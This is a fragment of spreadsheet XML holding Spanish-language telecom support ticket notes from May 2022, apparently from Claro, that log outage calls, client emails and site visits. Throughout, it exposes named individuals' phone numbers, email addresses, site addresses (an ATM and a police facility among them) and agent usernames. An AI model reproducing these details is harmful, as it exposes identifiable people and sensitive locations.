FECHA Y HORA LOCALES: 16/05/2022 11:12:44</t>
  </si>
  <si>
    <t>EN LLAMADA CON CLIETE EN DONDE CONFIRMA QUE SE PUEDA CORDINAR LA VISITA PARA EL DÍA DE MAÑANA , YA QUE HOY NO CUENTA CON ENERGÍA EN SITIO
RESULTADO: LLAMADA HECHA
NOMBRE: 30259662
NÚMERO: 011 50230259662
INICIO: HOY, 11:05
FIN: HOY, 11:07
DURACIÓN: 1:14
ID DE LLAMADA: 2001645690</t>
  </si>
  <si>
    <t>SE HABLÓ CON JOSÉ CAMPOSECO/PR 30259662 INDICA QUE HAY CORTE DE ENERGÍA ELÉCTRICA PROGRAMADO POR EMPRESA QUE LES BRINDA SERVICIO HASTA LAS 17:00 HORAS, PIDE SE CONTINÚE SEGUIMIENTO MAÑANA A LAS 08:00AM, ADICIONAL SE LLAMÓ A CENTRAL 42617499 PARA BRINDARLE AVANCES DEL TICKET, NO CONTESTA.</t>
  </si>
  <si>
    <t>F4564803</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS NAVARRO AL 51552078 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
-ID 2001690723
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS NAVARRO 51552078 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001647835</t>
  </si>
  <si>
    <t>F4564812</t>
  </si>
  <si>
    <t>--- EN LINEA CON HECTOR GONZALEZ 46402192 (CLIENTE DEL PUNTO REMOTO), SE ESTA LLAMANDO A CNOC REACTIVO. ...</t>
  </si>
  <si>
    <t>--- SE RESPONDE CORREO AL CLIENTE. ...
DE: DIEGO PABLO AJIN HERNANDEZ
ENVIADO EL: LUNES, 16 DE MAYO DE 2022 17:36
PARA: WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;
CC: HELPDESK@CAMPERO.COM; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; MESA DE SERVICIO TI &lt;MESADESERVICIOTI@SOMOSCMI.COM&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: G423 - SERVICIO DE INTERNET ID SIM S/N: 89502 03003 80652 8417F, LINEA 3440 5484
WALTER.
                GRACIAS POR LA INFORMACIÓN.
                PERSONAL A CARGO SE ENCUENTRA EN LÍNEA CON EL PUNTO REMOTO REALIZANDO PRUEBAS.
QUEDAMOS A LA ESPERA DE LOS COMENTARIOS POR PARTE DE GRUPO N1 AL CONCLUIR EL AUDIO.
ATENTAMENTE:
DE: WALTER ANIBAL REYES [MAILTO:WALTER.REYES@SOMOSCMI.COM]
ENVIADO EL: LUNES, 16 DE MAYO DE 2022 16:57
PARA: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; DARWIN HUSSEIN ESPANA NORIEGA &lt;DARWINH.ESPANA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;
CC: HELPDESK@CAMPERO.COM; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; MESA DE SERVICIO TI &lt;MESADESERVICIOTI@SOMOSCMI.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: G423 - SERVICIO DE INTERNET ID SIM S/N: 89502 03003 80652 8417F, LINEA 3440 5484
BUENA TARDE, FAVOR CONTACTAR A HECTOR AL 46402192.
SALUDOS,
 	WALTER ANIBAL REYES
ADMINISTRADOR DE PROYECTOS
WALTER.REYES@SOMOSCMI.COM
CMI ALIMENTOS	
CMI LA FUERZA QUE NOS UNE PARA TRASCENDER
WWW.SOMOSCMI.COM
LEGAL/PRIVACY
...</t>
  </si>
  <si>
    <t>SE SOLICITO APLICAR REINICIO A CLIENTE SR. HECTOR GONZALEZ 46402192 -.....</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 16 DE MAYO DE 2022 16:47
PARA: DARWIN HUSSEIN ESPANA NORIEGA &lt;DARWINH.ESPANA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;
CC: HELPDESK@CAMPERO.COM &lt;HELPDESK@CAMPERO.COM&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; MESA DE SERVICIO TI &lt;MESADESERVICIOTI@SOMOSCMI.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: G423 - SERVICIO DE INTERNET ID SIM S/N: 89502 03003 80652 8417F, LINEA 3440 5484
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>--- SE RECIE CORREO DEL CLIENTE. ...
DE: WALTER ANIBAL REYES [MAILTO:WALTER.REYES@SOMOSCMI.COM]
ENVIADO EL: LUNES, 16 DE MAYO DE 2022 16:57
PARA: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; DARWIN HUSSEIN ESPANA NORIEGA &lt;DARWINH.ESPANA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;
CC: HELPDESK@CAMPERO.COM; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; MESA DE SERVICIO TI &lt;MESADESERVICIOTI@SOMOSCMI.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: G423 - SERVICIO DE INTERNET ID SIM S/N: 89502 03003 80652 8417F, LINEA 3440 5484
BUENA TARDE, FAVOR CONTACTAR A HECTOR AL 46402192.
SALUDOS,
 	WALTER ANIBAL REYES
ADMINISTRADOR DE PROYECTOS
WALTER.REYES@SOMOSCMI.COM
CMI ALIMENTOS	
CMI LA FUERZA QUE NOS UNE PARA TRASCENDER
WWW.SOMOSCMI.COM
LEGAL/PRIVACY
...</t>
  </si>
  <si>
    <t>--- EN LINEA CON MIGUEL RODRIGUEZ, SE CONSULTA POR PERLA ESTRADA (GESTORA ASIGNADA), SOLICITA UN MOMENTO. ...</t>
  </si>
  <si>
    <t>F4564820</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS LOPEZ 0050641093068 SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001656997</t>
  </si>
  <si>
    <t>F4564822</t>
  </si>
  <si>
    <t>*** SE ENVÍA CORREO A CLIENTE CON LAS PRUEBAS, DONDE SE LOGRA VISUALIZAR QUE CTC EQUIPO DE ÚLTIMA MILLA ESTÁ NEGOCIANDO EN EL PUERTO ETH2 A 1G FD ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 18 DE MAYO DE 2022 10:22
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; DAVID DEL VALLE &lt;DAVID.DELVALLE@SOMOSCMI.COM&gt;; ANGELO MAURICIO VALLEJOS &lt;ANGELO.VALLEJOS@CLARO.COM.GT&gt;; JUAN JOSE ANLEU SARAVIA &lt;JUAN.ANLEU@CLARO.COM.GT&gt;; ALEJANDRO ROMÁN &lt;ALEJANDRO.ROMAN@SOMOSCMI.COM&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; DAVID ANDREE LARRAÑAGA CHINCHILLA &lt;DAVID.LARRANAGA@CLARO.COM.GT&gt;
CC: CARLOS MERIDA &lt;CARLOS.MERIDA@SOMOSCMI.COM&gt;; MARVIN CHO &lt;MARVIN.CHO@SOMOSCMI.COM&gt;; CAROLINA BALTODANO &lt;CAROLINA.BALTODANO@SOMOSCMI.COM&gt;; OMAR RODRIGUEZ &lt;OMAR.RODRIGUEZ@SOMOSCMI.COM&gt;; MARIO ALBERTO TRABANINO IXCOT &lt;MARIO.TRABANINO@CLARO.COM.GT&gt;; ANA CECILIA POZUELOS PACHECO &lt;ANA.POZUELOS@CLARO.COM.GT&gt;; RICARDO GIRON CASTILLO &lt;RICARDO.GIRON@SOMOSCMI.COM&gt;; LUIS ALBERTO GAYTAN PONTAZA &lt;LUIS.GAYTAN@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; JOSE DANIEL TAROTT &lt;JOSE.TAROTT@SOMOSCMI.COM&gt;
ASUNTO: RE: INCIDENTE R1
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DEL CASO, SE HA REALIZADO CAMBIO DE NEGOCIACIONES A NUESTRO EQUIPO CTC COLOCANDO EN MODO AUTONEGOCIABLE. SIENDO ASÍ, SE OBSERVA QUE SE REALIZAN CAMBIOS EN EQUIPO FW POR DANIEIL TAROTT Y SE CONFIRMA ESTAR NEGOCIANDO A 1G F/D LUEGO DE LOS CAMBIOS.
FAVOR DE SU APOYO EN REALIZAR LAS PRUEBAS QUE CORRESPONDAN.
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE TAROT 55194520 INDICA QUE LE HA TIRADO PINES MUY ALTOS EN TIEMPO DE RESPUESTA SOLICITA QUE SE DEJE EN OBSERVACION PARA MAÑANA A LAS 8:00 AM **
ID 1001002896
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE TAROT 55194520 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID  1001090365</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CLIENTE SOLICITÓ MONITOREO POR 24 HORAS, SE DEBE VALIDAR SERVICIO A LAS 16:00 HORAS, SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE MOVER TICKET A ESTADO DE MONITOREO</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE MAX CAAL, QUIEN CONFIRMA  QUE EL EQUIPO SE PROPIEDAD DE CLARO Y PROPORCIONA DATOS PARA VISITA
HORAIO 8:00 A 17:00 HORAS
ENVIAR NOMBRE DE LOS TECNICOS AL CORREO: JOSE.TAROTT@SOMOSCMI.COM
DIRECCION: HIDROELECTRICA RENACE 1 CARCHA ALTA VERAPAZ, ALDEA CHIUARRUM.
CONTACTO EN SITIO: MAX CAAL</t>
  </si>
  <si>
    <t>*** SE VALIDA QUE CLIENTE JOSE DANIEL TAROT HA REALIZADO CAMBIO DE NEGOCIACIONES EN SU FW YA QUE SE OBSERVA NEGOCIANDO A 1G FD ***
*** SE LE TRATÓ DE CONTACTAR 55194520, SIN EMBARGO, NO SE LOGRA LA COMUNICACIÓN (ID 3001108582 / 3001108210) ***
CC-CMI-RENACE-GT-INTERNET-672200002-3T:/&gt;PORT CONFIGURATION
PORT CONFIGURATION:
===================
PORT  STATE     MODE         FLOW CONTROL  MAXFRAME  POWER     EXCESSIVE  LINK
----  --------  -----------  ------------  --------  --------  ---------  ----
1     ENABLED   AUTO_NEGO    DISABLED      9600      ENABLED   DISCARD    DOWN
2     ENABLED   AUTO_NEGO    DISABLED      9600      ENABLED   DISCARD    1GFDX
3     ENABLED   AUTO_NEGO    DISABLED      9600      ENABLED   DISCARD    DOWN
4     ENABLED   AUTO_NEGO    DISABLED      9600      ENABLED   DISCARD    DOWN
5     ENABLED   AUTO_NEGO    DISABLED      9600      ENABLED   DISCARD    DOWN
6     ENABLED   AUTO_NEGO    DISABLED      9600      ENABLED   DISCARD    DOWN
7     ENABLED   AUTO_NEGO    DISABLED      9600      ENABLED   DISCARD    DOWN
8     ENABLED   AUTO_NEGO    DISABLED      9600      ENABLED   DISCARD    DOWN
9     ENABLED   DETECTION    DISABLED      9600      DISABLED  DISCARD    1GFDX
10    ENABLED   AUTO_NEGO    DISABLED      9600      DISABLED  DISCARD    DOWN</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE TAROT 55194520 NO RESPONDE, ENVIA A BUZON
-ID 3001159197 - 3001159480</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE TAROT 55194520 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001113033 - 3001113677</t>
  </si>
  <si>
    <t>F4564826</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NAZARETH SILVA  84040641 MENCIONA QUE EL INCONVENIENTE ES LENTITUD PERO NO EN TODAS LAS PC
CLIENTE INDICA QUE EN UNAS PC TODO ESTA FUNCIONANDO BIEN POR LO QUE SE LE MENCIONA QUE ES UN TEMA INTERNO
CLIENTE MENCIONA QUE ESCALARA EL CASO CON SU IT PARA DARLE SEGUIMIENTO
-ID 2001664099</t>
  </si>
  <si>
    <t>F4564827</t>
  </si>
  <si>
    <t>EN GESTION CON TECNICO,,,  ESTA PRESENTE EN SITIO INDICA QUE EL MEDIO SE ENCUETRA EN VALORES OPTIMOS, SE ESTA A LA ESPERA DE APOYO POR PARTE DE EQUIPOS SV
2001822005
COLA:
NOMBRE: A: 50379638365
NÚMERO: 50379638365
DURACIÓN: 0:01:57
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 50379638365
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JANTONIO.FERNANDEZ
FECHA Y HORA LOCALES: 17/05/2022 08:15:45</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE JEREMIAS 70744530 MENCIONA QUE SI CUENTAN CON ENERGIA EN PR
SE SOLICITARON DATOS DE VISITA
-ID 2001661139
NOMBRE DEL CLIENTE: POLICIA NACIONAL CIVIL
UBICACIÓN: DETRAS DE ALCALDIA ILOPANGO, ENTRADA A LAS ESCUELAS DE AVIACION EN UN PORTON AZUL
CONTACTO EN SITIO: JOSE JEREMIAS - 70744530
HORARIO DE ATENCION:24/7
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>DESPACHO SV				
	WO OPEN                                			11:34
1/5	RICARDO DE PAZ	78432633	2 HORAS	13:34:00
2/5	HUMBERTO CHIQUILLO	78523419	3 HORAS	14:34:00
3/5	HUMBERTO CHIQUILLO	78523419	4 HORAS	15:34:00
4/5	OSCAR HERNANDEZ	7855-0164	5 HORAS	16:34:00
5/5	JUAN RIVAS 	7606-7202	7 HORAS	18:34:00</t>
  </si>
  <si>
    <t>F4564829</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MIGUEL AREVALO 61833048 MENCIONA QUE PERSISTE EL INCONVENEINTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001666777</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE SEGUN LO INDICADO VIA LLAMADA-
ID1165100/SAVIOR SOLUTIONS, S.A</t>
  </si>
  <si>
    <t>F4564831</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE AMILCAR CHOC 49293007 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001763898</t>
  </si>
  <si>
    <t>F4564832</t>
  </si>
  <si>
    <t>SE LLAMA  CLIENTE  87869705 - NELSON SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001689921</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE NOEL GAMEZ AL 87869705 INDICA QUE EL ESTA SOLICITANDO QUE SE LE ENVIE CORREO CON  GRAFICAS Y ANCHO DE BANDA SOLO ESO INDICA Y CORTA LLAMADA NO DEJA QUE SE LE PIDA EL CORREO Y SEGUN SE VE NO HAY CORREO REGISTRADO**
ID 2001943006
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NOEL GAMEZ 88838949  MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE BRINDA CONTACTO DE PR 87869705 - NELSON
SOLICITA SE LLAME EN 20 MIN
-ID 2001677236</t>
  </si>
  <si>
    <t>*SE LLAMA A CLIENTE NELSON AL 87869705 SOLICITA QUE SE LE ENVIEN LAS GRAFICAS PERO DICE QUE YA SE LE HA LLAMADO VARIAS VECES SOLO SOLICITA LAS GRAFICAS NO DEJA HABLAR Y CORTA LLAMADA SE INTENTA NUEVAMENTE E INDICA QUE YA BRINDO VARIAS VECES EL CORREO Y  BRINDA PERO BIEN RAPIDO SE LOGRA COPIAR EL CORREO TELEMATICA@BACCREDOMATIC.NI **
ID 2001700081 - 2001701137
**</t>
  </si>
  <si>
    <t>F4564858</t>
  </si>
  <si>
    <t>SE HABLÓ CON ELMER MARROQUÍN/CLIENTE 56148620 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>F4564867</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EFER VALENZUELA AL 23866004 INDICA QUE AUN NO TIENE SERVICIO QUE YA REINICIO EQUIPOS VERIFICO CONEXIONES PERO NO LEVANTA SOLICITA VISITA TECNICA Y BRINDA LOS SIGUIENTES DATOS || SE NOTIFICA A GESTOR **
HORARIO DE ATENCION: 8:00 A 17:00 HRS
GESTION DE PERMISOS: SOLO IDENTIFICADOS
DIRECCION: AVENIDA HINCAPIE 10-19 ZONA 13
ATENDERA EN SITIO: EFER VALENZUELA
ID 2001695920
**</t>
  </si>
  <si>
    <t>F4564886</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE CHAMIER 58749333 INDICA QUE AUN NO PUEDE REALIZAR LLAMADAS SOLO PUEDE HACER LLAMADAS ENTRE EXTENSIONES || SE NOTIFICA A GESTOR **
ID 2001678481
**</t>
  </si>
  <si>
    <t>F4564893</t>
  </si>
  <si>
    <t>CLEINTE VERIFICA A NVIEL INTERNO SU PBX- SE PROCEDE AL CIERRE DE LA FALLA ##PROBLEMA SE DETECTA EN LA PBX DEBIDO A QUE NO SALE CON LOS DIDS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DARWIN ALVARADO-73082323 || ENVIA A BUZON - SE INTENTARA NUEVAMENTE EN BREVE ##CIC
2001666040
COLA:
NOMBRE: A: 0050373082323
NÚMERO: 0050373082323
DURACIÓN: 0:00:38
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050373082323
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 16/05/2022 11:59:00
2001666534
COLA:
NOMBRE: A: 0050373082323
NÚMERO: 0050373082323
DURACIÓN: 0:00:24
ESTADO: MARCANDO
DETALLES: 0050373082323
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 16/05/2022 11:59:10
2001666040
COLA:
NOMBRE: A: 0050373082323
NÚMERO: 0050373082323
DURACIÓN: 0:00:16
ESTADO: MARCANDO
DETALLES: 0050373082323
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 16/05/2022 11:58:21</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  DARWIN ALVARADO-73082323 || ENVIA A BUZON - SE INTENTARA NUEVAMENTE EN BREVE##CLIENTE NO CONTESTA
 RESULTADO: LLAMADA HECHA
NOMBRE: 0050373082323
NÚMERO: 0050373082323
INICIO: HOY, 12:15
FIN: HOY, 12:16
DURACIÓN: 0:36
ID DE LLAMADA: 2001672539</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  DARWIN ALVARADO-73082323  SE TIENE EN LINEA- SE ESTA REALIZANDO PRUEBAS ##</t>
  </si>
  <si>
    <t>CLIENTE NOS COMENTA QUE EL PROBLEMA QUE ESTA REPORTANDO ES QUE NO PUEDE SALIR CON SUS EXTENSIONES- SE ESTAN REALIZANDO PRUEBAS, SE VERIFICA QUE LA PBX NOS ESTA SACANDO LA LLAMADA CON EL PRINCIPAL DEL CLIENTE--- CLIENTE ACTUALMENTE ESTAREALIZANDO PRUEBAS ## NOS MANTENEMOS EN LINEA##VIVO</t>
  </si>
  <si>
    <t>F4564894</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DANIEL MARIN 31106647  MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE, PERO SOLICITA LLAMADA PARA MAÑANA A LAS 8:30 HRS
-ID 2001780762</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BRENDA SQUIT 36533322 MENCIONA QUESI INGRESAN LAS LLAMADAS PERO PARA SACAR LAS LLAMADAS POR MOMENTOS DEJA SACAR LLAMADA Y POR MOMENTOS NO, SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001673756 - 2001673932</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE DANIEL MARIN 31106647 PERO NO CONTESTA, SE INTENTARA EN UNOS INSTANTES
2001709945
2001710275
2001710440</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE DANIEL MARIN 31106647 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001828587</t>
  </si>
  <si>
    <t>F4564913</t>
  </si>
  <si>
    <t>SE LLAMA A MONITOREO 5B, INDICA QUE AUN ESTA PENDIENTE LA VISITA POR PARTE DE TAVSA, SE INFORMA PRINCIPAL Y REDUNDANTE CAIDOS, SOLICITA SI SE PUEDE LLAMAR LUEGO DE LAS 17 HORAS</t>
  </si>
  <si>
    <t>SE REVISA COLA DE CORREO AUN NO SE TIENE RESPUESTA DEL CLIENTE
ASUNTO: F4564913 || 5B || CC_TYT_GT_ATM1013 || COMERCIAL ATANA</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 24207212 CONTESTA EL SEÑOR NELSON INDICA QUE VA A TRANSFERIR LA LLAMADA PERO SE CORTA LLAMADA **
-ID 2001592073
**</t>
  </si>
  <si>
    <t>SE HABLA CON MOISES PANCOJ DE MONITOREO 5B, INFORMA QUE EL DIA DE HOY ATENDIERON ATM, REINICIARON EQUIPOS Y VALIDARON CONEXIONES PERO ENLACE NO LOGRA RESTABLECER, POR LO QUE SOLICITA QUE SE VERIFIQUE CON UNA VISITA EN CONJUNTO CON CLARO. SE PROCEDERA SEGUN LO SOLICITADO.
ID
2001211721
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:03:00
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 25/05/2022 16:15:57</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE SOLICIANDO ACCESOS MAÑANA A LAS 10:00HRS
DE: CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 25 DE MAYO DE 2022 16:53
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; OPERADORES ATM 3 &lt;OPERADORES.ATM3@TAV.COM.GT&gt;; LUIS BOSARREYES &lt;LBOSARREYES@5B.COM.GT&gt;
CC: LGALINDO@5B.COM.GT &lt;LGALINDO@5B.COM.GT&gt;; OPERADORESATM &lt;OPERADORES.ATM@TAV.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; TELECOMUNICACIONES &lt;TTI@5B.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: F4564913 || 5B || CC_TYT_GT_ATM1013 || COMERCIAL ATANA
BUENAS TARDES APRECIABLE CLIENTE
SOLICITAMOS DE SU APOYO COORDINANDO ACCESOS EL DIA DE MAÑANA A LAS 10:00
DIRECCION:
UBICACIÓN (ATM 1013) QUICK FOTO, CENTRO COMERCIAL ATANA - BOULEVARD ATANASIO TZUL 51-57 ZONA 12
FAVOR SU APOYO SOLICITAR ACCESOS AL CENTRO COMERCIAL.
PERSONAL TECNIC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t>
  </si>
  <si>
    <t>*** SIN RESPUESTA DE CLIENTE, SE ENVÍA CORREO NUEVAMENTE. A LA ESPERA DE AUTORIZACIÓN DE ACCESOS ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: SÁBADO, 28 DE MAYO DE 2022 8:13
PARA: CARLOS ESTUARDO LEIVA RAMIREZ &lt;CARLOSE.LEIVA@CLARO.COM.GT&gt;; CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;; OPERADORES ATM 3 &lt;OPERADORES.ATM3@TAV.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; LUIS BOSARREYES &lt;LBOSARREYES@5B.COM.GT&gt;
CC: LGALINDO@5B.COM.GT &lt;LGALINDO@5B.COM.GT&gt;; OPERADORESATM &lt;OPERADORES.ATM@TAV.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; TELECOMUNICACIONES &lt;TTI@5B.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: F4564913 || 5B || CC_TYT_GT_ATM1013 || COMERCIAL ATANA
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DE LA FALLA, SOLICITAMOS DE SU APOYO EN CONFIRMAR DE AUTORIZADOS LOS ACCESOS A LOS DUCTOS DEL CENTRO COMERCIAL. A SU VEZ DE BRINDAR UNA FECHA Y HORA PARA LA VISITA TÉCNICA.
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE, A LA ESPERA DE LA RESPUESTA.
DE: CARLOS IVAN PALENCIA FLORES
ENVIADO: MARTES, 17 DE MAYO DE 2022 17:22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013
BUENA TARDE ESTIMADOS
SOLICITANDO SU APOYO PARA ENVIAR SUPERVISOR AL CAJERO PARA QUE NOS APOYE CON VALIDAR EL ESTADO DE LOS EQUIPOS Y CONEXIONES YA QUE ACTUALMENTE ESTA CAÍDO.
TICKET: F4564913
ID:806300015T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM1013
UBICADO EN: (ATM 1013) QUICK FOTO, CENTRO COMERCIAL ATANA - BOULEVARD ATANASIO TZUL 51-57 ZONA 12
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMA AL AREA DE MONITORE DE CAJEROS RESPONDE HECTOR QUIEN ME INDICA QUE SE ENVIE CORREO PARA QUE NOS APOYE CON ENVIAR TECNICO DE 5B PARA QUE REVISE EL CAJERO.
RESULTADO: LLAMADA HECHA
NOMBRE: 24207212
NÚMERO: 24207212
INICIO: HOY, 16:59
FIN: HOY, 17:07
DURACIÓN: 7:58
ID DE LLAMADA: 3001014689</t>
  </si>
  <si>
    <t>SE LLAMA SEGUN LO ACORDADO CON PERSONAL DE 5B E INFORMAN QUE SUPERVISOR AUN ESTA TRABAJANDO EN EL LUGAR PERO AUN NO TIENEN SEGUIMIENTO DE LA CAUSA DEL PROBLEMA POR LO QUE INDICA DANIEL QUE SE PUEDE LLAMAR EL DIA DE MAÑANA PARA VER EL DIAGNOSTICO QUE SE TIENE DEL ATM.
ID
2001013717
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:01:52
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 24/05/2022 18:01:36</t>
  </si>
  <si>
    <t>F4564914</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERIKA DE GOMEZ 24723628 PARA SOLICITAR DATOS DE VISITA
-ID 2001723525
NOMBRE DEL CLIENTE: FUNDECREDITO DE R.L.
UBICACIÓN: CANDELARIA DE LA FRONTERA SOBRE LA CARRETERA PANAMERICANA MEDIA CUADRA ARRIBA DE DON POLLO, SANTA ANA
CONTACTO EN SITIO: ERIKA DE GOMEZ 24723628
HORARIO DE ATENCION:8:00 - 17:00 HRS
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4564915</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  MARIA LUZ HIGUEROS 33593270 CLIENTE INDICA QUE ESTA ESPERANDO LLAMADAS QUE LE DIJERON QUE LE HIBAN A VOLVER A LLAMAR PERO NO RECUERDA QUIEN || SE NOTIFICA A GESTOR **
ID 2001704041
**</t>
  </si>
  <si>
